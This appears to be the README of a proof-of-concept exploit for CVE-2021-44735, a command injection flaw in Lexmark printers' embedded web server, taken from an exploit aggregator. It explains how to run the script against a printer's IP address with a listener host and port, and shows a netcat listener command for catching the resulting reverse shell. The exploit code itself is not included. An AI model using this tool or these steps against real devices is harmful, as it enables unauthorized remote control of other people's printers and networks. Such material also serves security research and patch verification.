## https://sploitus.com/exploit?id=7EC56C89-5D3E-5027-81AD-DDFAFC8B5606
# CVE-2021-44735 PoC
Embedded web server command injection vulnerability in Lexmark devices.
Exploit based on the following research https://www.crowdstrike.com/blog/how-to-compromise-a-printer-in-3-simple-steps/.
## Using
To run the exploit pass 3 arguments:
- rhost - printer IP-address
- lhost - IP-address of the interface for reverse-shell connection
- lport - port number for reverse-shell connection
```
python3 cve-2021-44735.py -r <rhost> -l <lhost> -p <lport>
```
![](./exploitation_example.png)
To receive a reverse-shell connection start listener on the specified lhost and lport, for example using `netcat`:
```
nc -nvlp 80
```
![](./exploitation_result.png)